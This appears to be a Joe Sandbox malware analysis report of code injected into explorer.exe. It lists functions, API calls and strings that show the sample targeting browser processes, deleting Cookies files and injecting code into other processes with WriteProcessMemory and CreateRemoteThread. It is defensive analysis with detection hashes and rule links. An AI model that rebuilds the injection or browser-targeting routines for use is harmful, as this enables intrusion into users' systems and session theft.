                            Function 00CE3BEA Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 143stringsleepprocessCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 108 ce3bea-ce3c43 call ce1000 * 2 wsprintfA call ce1235 115 ce3c67 108->115 116 ce3c45-ce3c55 call ce1141 108->116 118 ce3c6d-ce3c7d CreateToolhelp32Snapshot 115->118 122 ce3c5c-ce3c62 call ce1261 116->122 123 ce3c57 call ce38d3 116->123 120 ce3da7-ce3db2 Sleep 118->120 121 ce3c83-ce3c97 Process32First 118->121 120->118 124 ce3d98-ce3d9a 121->124 122->115 123->122 126 ce3c9c-ce3caa lstrcmpi 124->126 127 ce3da0-ce3da1 FindCloseChangeNotification 124->127 129 ce3cac-ce3cba lstrcmpi 126->129 130 ce3d00-ce3d0d call ce12aa 126->130 127->120 129->130 132 ce3cbc-ce3cca lstrcmpi 129->132 135 ce3d0f-ce3d18 call ce1305 130->135 136 ce3d8c-ce3d92 Process32Next 130->136 132->130 134 ce3ccc-ce3cda lstrcmpi 132->134 134->130 137 ce3cdc-ce3cea lstrcmpi 134->137 135->136 141 ce3d1a-ce3d21 call ce1320 135->141 136->124 137->130 139 ce3cec-ce3cfa lstrcmpi 137->139 139->130 139->136 141->136 144 ce3d23-ce3d30 call ce1274 141->144 144->136 147 ce3d32-ce3d87 lstrcmpi call ce1090 call ce213a call ce1090 144->147 147->136
                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • wsprintfA.USER32 ref: 00CE3C28
                              • Part of subcall function 00CE1235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00CE123F
                              • Part of subcall function 00CE1235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00CE3C3C), ref: 00CE1251
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE3C72
                            • Process32First.KERNEL32(00000000,?), ref: 00CE3C91
                            • lstrcmpi.KERNEL32(?,firefox.exe), ref: 00CE3CA6
                            • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00CE3CB6
                            • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00CE3CC6
                            • lstrcmpi.KERNEL32(?,opera.exe), ref: 00CE3CD6
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00CE3CE6
                            • lstrcmpi.KERNEL32(?,msedge.exe), ref: 00CE3CF6
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00CE3D3C
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00CE3D92
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CE3DA1
                            • Sleep.KERNELBASE(000003E8), ref: 00CE3DAC
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00000000,00001000,?,00000000,00000000,00CE32FE,00000001), ref: 00CE1150
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00CE4420), ref: 00CE1155
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateChangeCloseCreateFindFirstMappingNextNotificationOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                            • String ID: %s%s$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe$msedge.exe$opera.exe
                            • API String ID: 1384999969-4091821209
                            • Opcode ID: 8480782a6426332cf756b2cff1c77adb651a8c30e4be3b57bdc8ffcee2adbb66
                            • Instruction ID: baa23b20f178715da71401082e0caa528ab8d9c06a9cb6182f5384912027116c
                            • Opcode Fuzzy Hash: 8480782a6426332cf756b2cff1c77adb651a8c30e4be3b57bdc8ffcee2adbb66
                            • Instruction Fuzzy Hash: 1841E671A143C49BC618EB73DC89B3F7BAD9F85B80F040528FA11971D1DB34EB0596A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE3DB7 Relevance: 4.5, APIs: 3, Instructions: 46nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 153 ce3db7-ce3dc1 call ce1274 156 ce3e2d-ce3e2e 153->156 157 ce3dc3-ce3dec call ce1000 RtlMoveMemory 153->157 160 ce3dee-ce3e0c call ce1000 RtlMoveMemory 157->160 161 ce3e12-ce3e26 NtUnmapViewOfSection 157->161 160->161 163 ce3e28-ce3e29 161->163 164 ce3e34-ce3e3f call ce3bea 161->164 163->156 167 ce3e2b-ce3e2f call ce38ea 163->167 171 ce3e4a-ce3e4d 164->171 172 ce3e41-ce3e45 call ce3db7 164->172 167->164 172->171
                            APIs
                              • Part of subcall function 00CE1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CE1281
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00CE3DD9
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00CE3E0C
                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00CE3E15
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                            • String ID:
                            • API String ID: 4050682147-0
                            • Opcode ID: f4d7dcb308bdb765a57ea53ce17d90302121fdb220a324f8e152b93765d3e6e0
                            • Instruction ID: e1f6f5f510d788731a9aa1c79becc32326f3c8d6321d835b0751ba54a4126a3f
                            • Opcode Fuzzy Hash: f4d7dcb308bdb765a57ea53ce17d90302121fdb220a324f8e152b93765d3e6e0
                            • Instruction Fuzzy Hash: 8B0184715102D09FC728AB66EC9CB7F3798EF55361F044568F6228B2A1CB356B41DB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE1000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 236 ce1000-ce1010 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: a500657772f565651d03511836e12111ef06f1ff1f9a981ee27004206d5d57e5
                            • Instruction ID: 04cf7f6dc9319f039f2e3e6576c2f17da3dc8092d275e77aed37f12969578a9b
                            • Opcode Fuzzy Hash: a500657772f565651d03511836e12111ef06f1ff1f9a981ee27004206d5d57e5
                            • Instruction Fuzzy Hash: BCA002B5554180DFDD8857E49D4DF1D351CA744701F00C554B34689150D96554148731
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE9992 Relevance: 3.2, APIs: 2, Instructions: 205COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 174 ce9992-ce99b2 175 ce9a08 174->175 176 ce99b4-ce99b5 174->176 177 ce9a1a-ce9a1f 175->177 178 ce9a21 177->178 179 ce9a23 178->179 180 ce9a10-ce9a15 178->180 182 ce9a28-ce9a2a 179->182 181 ce9a16-ce9a18 180->181 181->177 181->178 183 ce9a2c-ce9a31 182->183 184 ce9a33-ce9a37 182->184 183->184 184->182 185 ce9a39 184->185 186 ce9a3b-ce9a42 185->186 187 ce9a44-ce9a49 185->187 186->182 186->187 188 ce9a4b-ce9a54 187->188 189 ce9a58-ce9a5a 187->189 192 ce9aca-ce9acd 188->192 193 ce9a56 188->193 190 ce9a5c-ce9a61 189->190 191 ce9a63-ce9a67 189->191 190->191 195 ce9a69-ce9a6e 191->195 196 ce9a70-ce9a72 191->196 194 ce9ad2-ce9ad5 192->194 193->189 197 ce9ad7-ce9ad9 194->197 195->196 198 ce9a94-ce9aa3 196->198 199 ce9a74 196->199 197->194 200 ce9adb-ce9ade 197->200 202 ce9ab4-ce9ac1 198->202 203 ce9aa5-ce9aac 198->203 201 ce9a75-ce9a77 199->201 200->194 205 ce9ae0-ce9afc 200->205 206 ce9a79-ce9a7e 201->206 207 ce9a80-ce9a84 201->207 202->202 204 ce9ac3-ce9ac5 202->204 203->203 208 ce9aae 203->208 204->181 205->197 209 ce9afe 205->209 206->207 207->201 210 ce9a86 207->210 208->181 211 ce9b04-ce9b08 209->211 212 ce9a88-ce9a8f 210->212 213 ce9a91 210->213 214 ce9b4f-ce9b52 211->214 215 ce9b0a-ce9b20 211->215 212->201 212->213 213->198 216 ce9b55-ce9b5c 214->216 223 ce9b21-ce9b26 215->223 217 ce9b5e-ce9b60 216->217 218 ce9b80-ce9bb0 VirtualProtect * 2 216->218 220 ce9b62-ce9b71 217->220 221 ce9b73-ce9b7e 217->221 222 ce9bb4-ce9bb8 218->222 220->216 221->220 222->222 224 ce9bba 222->224 223->211 225 ce9b28-ce9b2a 223->225 226 ce9bbd 224->226 227 ce9b2c-ce9b32 225->227 228 ce9b33-ce9b40 225->228 226->226 227->228 230 ce9b49-ce9b4c 228->230 231 ce9b42-ce9b47 228->231 231->223
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507985797.0000000000CE8000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE8000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce8000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 041b4e0399a031582abd114fc4347bcee5fc619ac8426c4fef0a7cd21aa32b5c
                            • Instruction ID: 1cc97e0113bd75eabc9475e7f296215980a97c968e418a0875d0bcfd7bff1d82
                            • Opcode Fuzzy Hash: 041b4e0399a031582abd114fc4347bcee5fc619ac8426c4fef0a7cd21aa32b5c
                            • Instruction Fuzzy Hash: 3D5138B2A442D25BD7308EBADC806B577A4EF52320B180779C8F2CB3C6E7B45906E750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE1235 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 232 ce1235-ce1247 OpenFileMappingA 233 ce125c-ce1260 232->233 234 ce1249-ce1259 MapViewOfFile 232->234 234->233
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00CE123F
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00CE3C3C), ref: 00CE1251
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 79f7312ad92f8b19e73ee2b73b5f5bb35f9f6b33461aed6e8098bb8b26f715c5
                            • Instruction ID: 8f882f9a64e34bdc53e08d15cd887b620293021d21eeba0d09de81e21591d196
                            • Opcode Fuzzy Hash: 79f7312ad92f8b19e73ee2b73b5f5bb35f9f6b33461aed6e8098bb8b26f715c5
                            • Instruction Fuzzy Hash: EED017327012716BE3345E6B6C4CF876EDDDF86AE1B060035B609D7090E6608810C2F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE1261 Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 235 ce1261-ce1273 UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,00000000,00CE3C67,00000001), ref: 00CE1265
                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00CE126C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: d6abf6270d4d30e419d498bb87c80294f7b22a32538f5ca758fc27222813bad2
                            • Instruction ID: 961ed6c52c4be3efce48eb7cde097de6321e34a9cb33552b0fa25bf62f741157
                            • Opcode Fuzzy Hash: d6abf6270d4d30e419d498bb87c80294f7b22a32538f5ca758fc27222813bad2
                            • Instruction Fuzzy Hash: C3B012364050709B872C27267E8CBCF3E18DE492313010171F709890104724080196E4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00CE213A Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CE1281
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,77296900,00000001,?), ref: 00CE216F
                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00CE21AA
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00CE223A
                            • RtlMoveMemory.NTDLL(00000000,00CE5078,00000016), ref: 00CE2261
                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00CE2289
                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00CE2299
                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 00CE22B3
                            • GetLastError.KERNEL32 ref: 00CE22BB
                            • CloseHandle.KERNEL32(00000000), ref: 00CE22C9
                            • Sleep.KERNEL32(000003E8), ref: 00CE22D0
                            • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00CE22E6
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE22ED
                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00CE2303
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00CE232D
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CE2340
                            • CloseHandle.KERNEL32(00000000), ref: 00CE2347
                            • Sleep.KERNEL32(000001F4), ref: 00CE234E
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00CE2362
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00CE2379
                            • CloseHandle.KERNEL32(00000000), ref: 00CE2386
                            • CloseHandle.KERNEL32(?), ref: 00CE238C
                            • CloseHandle.KERNEL32(?), ref: 00CE2392
                            • CloseHandle.KERNEL32(00000000), ref: 00CE2395
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                            • String ID: atan$ntdll$opera_shared_counter
                            • API String ID: 1066286714-2737717697
                            • Opcode ID: f5d28f8beb99f075a253e97ed13da630139a0d06317136eabe87be992886144f
                            • Instruction ID: b479a352862d5fb12cb70224416efa1b666a41911b96961da983634ade25e164
                            • Opcode Fuzzy Hash: f5d28f8beb99f075a253e97ed13da630139a0d06317136eabe87be992886144f
                            • Instruction Fuzzy Hash: AB618B71604384AFD3149F26DC84F6F7BEDEB88764F000529FA59D62A1DB74DE048BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE15BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87filestringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • PathCombineW.SHLWAPI(00000000,00000000,*.*,772D82B0,00000000,74DC3BB0,77D4D600), ref: 00CE15EB
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00CE15F7
                            • lstrcmpiW.KERNEL32(?,00CE41C8), ref: 00CE1623
                            • lstrcmpiW.KERNEL32(?,00CE41CC), ref: 00CE1633
                            • PathCombineW.SHLWAPI(00000000,?,?), ref: 00CE164C
                            • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00CE1661
                            • PathCombineW.SHLWAPI(00000000,?,?), ref: 00CE167E
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE169C
                            • FindClose.KERNEL32(00000000), ref: 00CE16AB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                            • String ID: *.*$Cookies*
                            • API String ID: 4256701249-3228320225
                            • Opcode ID: f961f5ab2a5fbe6d8bb8cce667c184195c3b3dbd8b8b2637f81eddfd226452ca
                            • Instruction ID: 97cbc7557415602b089d255e666bf40be2d03cd814444625f47088e33379214c
                            • Opcode Fuzzy Hash: f961f5ab2a5fbe6d8bb8cce667c184195c3b3dbd8b8b2637f81eddfd226452ca
                            • Instruction Fuzzy Hash: E521B1316043855BD704AB629C84B7F7BECEB88391F080929FD96D7241DA38CE9497A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE14D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CE13FE: wsprintfW.USER32 ref: 00CE142A
                              • Part of subcall function 00CE13FE: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE1439
                              • Part of subcall function 00CE13FE: wsprintfW.USER32 ref: 00CE1476
                              • Part of subcall function 00CE13FE: RemoveDirectoryW.KERNEL32(00000000), ref: 00CE149C
                              • Part of subcall function 00CE13FE: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE14AF
                              • Part of subcall function 00CE13FE: FindClose.KERNEL32(00000000), ref: 00CE14BA
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • wsprintfW.USER32 ref: 00CE150D
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00CE151C
                            • wsprintfW.USER32 ref: 00CE1557
                            • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 00CE156A
                            • DeleteFileW.KERNEL32(00000000), ref: 00CE1571
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1584
                            • FindClose.KERNEL32(00000000), ref: 00CE158F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                            • String ID: %s%s$*.*
                            • API String ID: 2055899612-705776850
                            • Opcode ID: 6d7cc1f3a13fc2cde01a92d93e08fa0972235f3def94e84e65da2b3ad77781a9
                            • Instruction ID: 72eacf2246309106c4f68a89d2de88274038c442bf2fd6b8f68fbb33da597c14
                            • Opcode Fuzzy Hash: 6d7cc1f3a13fc2cde01a92d93e08fa0972235f3def94e84e65da2b3ad77781a9
                            • Instruction Fuzzy Hash: E5113B316003C05BD714BB369C89B7F3B9CDFD9355F040529FE62821A2DB348EA492A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE13FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • wsprintfW.USER32 ref: 00CE142A
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00CE1439
                            • wsprintfW.USER32 ref: 00CE1476
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE150D
                              • Part of subcall function 00CE14D8: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE151C
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE1557
                              • Part of subcall function 00CE14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 00CE156A
                              • Part of subcall function 00CE14D8: DeleteFileW.KERNEL32(00000000), ref: 00CE1571
                              • Part of subcall function 00CE14D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1584
                              • Part of subcall function 00CE14D8: FindClose.KERNEL32(00000000), ref: 00CE158F
                            • RemoveDirectoryW.KERNEL32(00000000), ref: 00CE149C
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE14AF
                            • FindClose.KERNEL32(00000000), ref: 00CE14BA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                            • String ID: %s%s$%s%s\$*.*
                            • API String ID: 2055899612-4093207852
                            • Opcode ID: 19e110ab74d8716f3fe38bf839ef6530df0d50392b68097a554edb16b3e849b5
                            • Instruction ID: f635685fba3fff49cad17becef31628874321fcc47734a38452b8dd676dcdd22
                            • Opcode Fuzzy Hash: 19e110ab74d8716f3fe38bf839ef6530df0d50392b68097a554edb16b3e849b5
                            • Instruction Fuzzy Hash: 9F110F316043C05BE718AB26DC88B7F7ADCAFD5311F08092CFE92922D2DB344D989662
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                            Download Yara Rule
                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00CE11A9
                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00CE11C1
                            • lstrlen.KERNEL32(?,00000000), ref: 00CE11C9
                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00CE11D4
                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00CE11EE
                            • wsprintfA.USER32 ref: 00CE1205
                            • CryptDestroyHash.ADVAPI32(?), ref: 00CE121E
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00CE1228
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                            • String ID: %02X
                            • API String ID: 3341110664-436463671
                            • Opcode ID: 32c423b56c3b2a2286bdc6f01c86d0a049b972538d393681b9de0e30b2d57dca
                            • Instruction ID: 83ca41399bf34b4700f9a8f81d86a1cd6c4a71092db5e449d02f2ad5b661e22e
                            • Opcode Fuzzy Hash: 32c423b56c3b2a2286bdc6f01c86d0a049b972538d393681b9de0e30b2d57dca
                            • Instruction Fuzzy Hash: 79113A72900148BFEB159FA5EC89FAEBBBCEB48311F1044B5FA05E6160DB714E51AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE16C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00CE16D9
                            • GetCurrentThreadId.KERNEL32 ref: 00CE16E1
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00CE16F1
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 00CE16FF
                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00CE171E
                            • SuspendThread.KERNEL32(00000000), ref: 00CE172E
                            • CloseHandle.KERNEL32(00000000), ref: 00CE173D
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 00CE174D
                            • CloseHandle.KERNEL32(00000000), ref: 00CE1758
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                            • String ID:
                            • API String ID: 1467098526-0
                            • Opcode ID: 49679ee67004957a7e551f1e0b5b00fa98717a768a8e3f31a60a4d868a63af3b
                            • Instruction ID: 2d265c502fc05100b894c7fcd9f9d5a6eded7db1b72e9697bb7bc36acf7267a9
                            • Opcode Fuzzy Hash: 49679ee67004957a7e551f1e0b5b00fa98717a768a8e3f31a60a4d868a63af3b
                            • Instruction Fuzzy Hash: D71130714082C0DFD7159F62AC8C76E7AA8EF85B11F04052AFB4196150D7348A559BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE1FA1 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • RtlMoveMemory.NTDLL(?,?,?), ref: 00CE1FD8
                            • LoadLibraryA.KERNEL32(?,00CE6050,00000000,00000000,772EF560,00000000,00CE2231,?), ref: 00CE2000
                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00CE202D
                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00CE207E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                            • String ID:
                            • API String ID: 3827878703-0
                            • Opcode ID: 6d47c2c2d14d7a73a35666e228d61bda2a9cb4d981ba90d0393c398e3f991a55
                            • Instruction ID: c01990cf1e77c59e70e0c9af3b75dbac9caf20e54dfb9358e7a7baefe297b0a8
                            • Opcode Fuzzy Hash: 6d47c2c2d14d7a73a35666e228d61bda2a9cb4d981ba90d0393c398e3f991a55
                            • Instruction Fuzzy Hash: 1331B472300252ABCB28CF6BCC84B66B7ACFF45304F14452DE856CB281D736E955D7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE1765 Relevance: 4.5, APIs: 3, Instructions: 40encryptionstringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32 ref: 00CE1771
                            • CryptBinaryToStringA.CRYPT32(?,00000000,00000001,00000000,?), ref: 00CE1786
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • CryptBinaryToStringA.CRYPT32(?,00000000,00000001,00000000,?), ref: 00CE17A6
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                            • String ID:
                            • API String ID: 117552131-0
                            • Opcode ID: 90dd18ae899f1869cb2191b8a3477262521ceea84f35085981afc93a3fa68a29
                            • Instruction ID: d78ff57c7f8de37e1ad3692fb6746624126ab5f5a3b055746aeaf55262f47605
                            • Opcode Fuzzy Hash: 90dd18ae899f1869cb2191b8a3477262521ceea84f35085981afc93a3fa68a29
                            • Instruction Fuzzy Hash: 71F0E932600159FBD7248AD69CC5FBFFBACDB41A90B040079FA05C6100DAB18E0192B0
                            Uniqueness

                            Uniqueness Score: -1.00%

